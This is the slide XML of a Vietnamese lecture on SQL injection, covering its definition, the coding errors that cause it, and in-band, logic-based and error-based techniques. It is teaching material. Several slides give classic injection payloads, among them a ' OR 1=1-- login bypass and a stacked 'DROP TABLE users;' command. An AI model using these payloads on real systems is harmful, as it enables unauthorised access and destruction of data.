              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection (SQLi)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.1.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2968A1CB-BF1A-0A79-5F8F-A9772C70A8A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24</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BF6782F-0634-3180-7519-542870DF8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1550385"/>
            <a:ext cx="86868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Định nghĩa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kỹ thuật tấn công lợi dụng lỗ hổng trong quá trình kiểm tra và lọc dữ liệu đầu vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDBAE807-251A-5F1F-1893-9C404BC33F93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3544570" y="2676794"/>
            <a:ext cx="5447030" cy="2873083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E34BA1-2493-0543-2AA9-A07A51788E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2656777"/>
            <a:ext cx="3392170" cy="2893100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kẻ tấn công "tiêm" các câu lệnh SQL bất hợp pháp thông qua form nhập liệu để thực thi truy vấn không mong muốn trên cơ sở dữ liệu..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="717039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D7962-1AEB-591B-9FA0-6AB906AA864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A7A60DA-440F-C656-6811-FEC87A1F7F31}"/>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FE9C847F-BC30-4804-521A-90D93EE0C1B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.1.2. Các loại Lỗi thường gặp dẫn đến SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E84FBDEF-9598-B6F3-E90A-54ED3EF2DC6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25</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0522635-C7FC-F3CF-2161-B8B397DE6B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383281" y="1611765"/>
            <a:ext cx="8229600" cy="363432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Không kiểm tra ký tự thoát truy vấn (Escaping Characters): Lỗi cơ bản nhất, xảy ra khi không kiểm tra các ký tự đặc biệt như dấu nháy đơn ( ' ). Cho phép vượt qua xác thực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ví dụ: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SELECT</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users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WHERE</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name</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3200" b="1"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OR</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'true'</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200" b="1"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'true'</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hoặc xóa bảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>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DROP</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users;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255828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18136-F0CD-7B6A-30D5-202E2100C3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21719CE-BEB3-5AC2-782F-59192604540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AA7526F5-69C2-02D6-FF04-AC0A73EFD344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.1.2. Các loại Lỗi thường gặp dẫn đến SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70C0DC3-C8DF-EA09-4024-15CC7E2D79D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26</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26045685-9DB6-C047-EF33-BAFBAEFC0F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1790700"/>
            <a:ext cx="9144000" cy="350095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Xử lý không đúng kiểu dữ liệu (Incorrect Data Type Handling): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Xảy ra khi lập trình viên không kiểm tra tính hợp lệ của dữ liệu đầu vào, cho phép chèn chuỗi ký tự vào trường số.</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Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>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SELECT</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WHERE</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id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" kern="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DROP</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users; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Câu lệnh này sẽ tìm bản ghi có id bằng 1 và sau đó xóa toàn bộ bảng users.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3341796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99DA0-27C0-20D8-D2EF-C2069784AF8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B3A618-9E50-8113-2F3D-7A6431B8F22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5E89F383-0F21-ADF6-B165-D5D3933A8EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="4537139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.1.3.Các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (In-band SQL Injection)</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5B5B8A7D-8B30-10A9-E779-0876D5E276F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27</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{179F3167-8A58-7D44-890D-51D899A481B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3619500"/>
            <a:ext cx="8915400" cy="1019290"/>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Kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tấn công sử dụng cùng một kênh giao tiếp để tấn công và nhận kết quả.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458237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3928E-C442-9EDD-607C-F167B633D59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2B7AE69-895D-DF80-7059-9EE42131B7F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AC5CFD03-732A-8DAA-C5FF-241078C01327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (In-band SQL Injection)</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13EB970A-8042-CC15-C2A2-E7DE54BAF1D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28</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F704749-0465-FBB1-E9FD-81260BF95384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2333216"/>
            <a:ext cx="8915400" cy="2413480"/>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Kỹ thuật Dựa trên Logic (Logic-based SQLi): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tấn công bằng câu lệnh SELECT, INSERT hoặc Vượt qua kiểm tra lúc đăng nhập (Login Bypass) bằng cách sử dụng các chuỗi khiến điều kiện xác thực luôn đúng (ví dụ: ' OR 1=1--)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1025693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002A7-596B-C24F-CECD-B685830AF5B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37E86C-FB43-A22D-F627-4EFC4110E79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3D13461C-B6A2-D811-E8BC-13A58E9887E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (In-band SQL Injection)</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30C4DC07-9B24-651A-E038-11FE75DA946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29</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D5289E-F342-2E9B-921F-4AC42361D70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2333216"/>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Kỹ thuật Dựa trên Lỗi (Error-based SQL Injection): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cố ý gây lỗi CSDL để thông báo lỗi tiết lộ thông tin nhạy cảm về cấu trúc CSDL (tên bảng, phiên bản DB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366180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95478"/>
            <a:ext cx="7877810" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Confidentiality (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr spc="-25"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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444500" y="1222628"/>
            <a:ext cx="8318500" cy="2462854"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="76835" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="446405" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="605"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="446405" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" spc="-40" dirty="0"/>
              <a:t>Đảm bảo thông tin được bảo vệ khỏi sự truy cập, sử dụng, hoặc thay đổi không được phép.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="446405" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
